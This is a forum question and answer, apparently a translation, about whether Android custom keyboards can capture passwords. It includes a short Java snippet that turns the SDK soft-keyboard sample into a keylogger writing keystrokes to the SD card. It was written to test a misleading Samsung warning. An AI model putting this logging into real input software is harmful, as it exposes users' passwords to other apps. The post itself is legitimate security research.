Android自定义键盘密码日志

我一直在研究Android自定义键盘的安全漏洞，发现了一些有趣的东西。当我在Sharp Aquos Gingerbread手机上安装键盘时，它告诉我它“可能能够收集你键入的所有文本，包括密码”。然而，在我运行ICS的三星Galaxy Tab 2上显示“密码除外”

我决定对此进行测试，并修改了软键盘Android SDK示例，使其包含一个键盘记录器，写入SD卡以使其更易于从其他应用程序访问：

public void onKey(int primaryCode, int[] keyCodes) {
    String keypress = String.valueOf((char)primaryCode);
    Log.d("Key Pressed",keypress);
    try{
        String SDCARD = Environment.getExternalStorageDirectory().getAbsolutePath();
        String FILENAME = "keylogger.txt";

        File outfile = new File(SDCARD+File.separator+FILENAME);
        FileOutputStream fos = new FileOutputStream(outfile,true);
        fos.write(keypress.getBytes());
        fos.close();
    }catch(Exception e) {
        Log.d("EXCEPTION",e.getMessage());
    }

我能够记录文本，甚至在HTML密码字段中

因此，我的Galaxy标签上的信息似乎不正确/误导

---

这是所有ICS设备上的相同消息，还是三星改变了Android版本的消息？有人知道为什么在很容易登录的情况下会显示“除了密码”吗？

在Galaxy Nexus上会显示“包括密码和信用卡号码等个人数据”。你必须联系三星才能获得真实的信息，但除非他们不允许在密码字段上使用自定义键盘或类似的东西，否则你键入的所有内容都会在某个时候通过软件键盘，所以他们可以记录下来